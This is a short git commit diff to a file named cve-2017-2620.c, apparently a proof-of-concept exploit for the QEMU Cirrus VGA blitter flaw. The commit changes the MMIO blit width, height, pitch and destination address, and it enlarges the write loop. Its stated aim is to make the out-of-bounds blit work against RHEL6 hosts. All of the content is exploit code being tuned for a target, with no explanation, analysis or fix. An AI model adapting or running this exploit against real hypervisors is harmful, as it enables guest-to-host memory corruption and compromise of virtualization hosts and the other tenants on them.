change blit params for rhel6

1 files changed, 10 insertions, 1 deletions

diff --git a/cve-2017-2620.c b/cve-2017-2620.c
index e9fb50f..724f95f 100644
--- a/cve-2017-2620.c
+++ b/cve-2017-2620.c
@@ -28,12 +28,21 @@ int main(int argc, char *argv[])
     mmio[BLT_OFFSET + CIRRUS_MMIO_BLTSTATUS] = CIRRUS_BLT_RESET;
     mmio[BLT_OFFSET + CIRRUS_MMIO_BLTSTATUS] = 0x00;
 
+#if 0
     *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTWIDTH)     = 1024 * 3  - 1;
     *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTHEIGHT)    = 1         - 1;
     *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTPITCH) = 1024 * 3;
     *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCPITCH)  = 1024 * 3;
     *(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTADDR)  = 16 * 1024 * 1024 - 1;
     *(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCADDR)   = 0;
+#else
+    *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTWIDTH)     = 3         - 1;
+    *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTHEIGHT)    = 1024 * 7  - 1;
+    *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTPITCH) = 1024 * 3;
+    *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCPITCH)  = 1024 * 3;
+    *(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTADDR)  = 16 * 1024 * 1024 - 4;
+    *(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCADDR)   = 0;
+#endif
 
     mmio[BLT_OFFSET + CIRRUS_MMIO_BLTMODE] =
         CIRRUS_BLTMODE_PIXELWIDTH24 | CIRRUS_BLTMODE_MEMSYSSRC;
@@ -44,7 +53,7 @@ int main(int argc, char *argv[])
     fprintf(stderr, "setup done\n");
     sleep(1);
 
-    for (i = 0; i < 16384; i++)
+    for (i = 0; i < 1024 * 7 * 3; i++)
         blit[i] = 0;
     fprintf(stderr, "blit done\n");
     sleep(1);